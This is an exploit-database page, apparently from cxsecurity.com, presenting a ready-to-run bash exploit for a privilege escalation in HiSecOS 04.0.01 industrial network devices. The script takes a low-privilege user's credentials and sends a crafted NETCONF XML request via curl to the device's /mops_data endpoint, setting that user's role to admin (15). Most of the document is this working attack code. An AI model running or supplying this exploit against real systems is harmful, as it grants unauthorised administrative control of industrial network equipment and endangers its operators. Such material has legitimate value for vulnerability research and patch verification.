HiSecOS 04.0.01 Privilege Escalation

2023.06.22
Credit: dreizehnutters
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-264
Dork: HiSecOS Web Server Vulnerability Allows User Role Privilege Escalation

# Exploit Title: HiSecOS 04.0.01 - Privilege Escalation # Google Dork: HiSecOS Web Server Vulnerability Allows User Role Privilege Escalation # Date: 21.06.2023 # Exploit Author: dreizehnutters # Vendor Homepage: https://dam.belden.com/dmm3bwsv3/assetstream.aspx?assetid=15437&mediaformatid=50063&destinationid=10016 # Version: HiSecOS-04.0.01 or lower # Tested on: HiSecOS-04.0.01 # CVE: BSECV-2021-07 #!/bin/bash if [[ $# -lt 3 ]]; then echo "Usage: $0 <IP> <USERNAME> <PASSWORD>" exit 1 fi target="$1" user="$2" pass="$3" # Craft basic header auth=$(echo -ne "$user:$pass" | base64) # Convert to ASCII hex blob=$(printf "$user" | xxd -ps -c 1) # Generate XML payload ('15' -> admin role) gen_payload() { cat <<EOF <rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:x-mops:1.0 ../mops.xsd" message-id="20"> <mibOperation xmlns="urn:x-mops:1.0"> <edit-config> <MIBData> <MIB name="HM2-USERMGMT-MIB"> <Node name="hm2UserConfigEntry"> <Index> <Attribute name="hm2UserName">$blob</Attribute> </Index> <Set name="hm2UserAccessRole">15</Set> </Node> </MIB> </MIBData> </edit-config> </mibOperation> </rpc> EOF } curl -i -s -k -X POST \ -H "content-type: application/xml" \ -H "authorization: Basic ${auth}" \ --data-binary "$(gen_payload)" \ "https://${target}/mops_data" echo "[*] $user is now an admin"


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top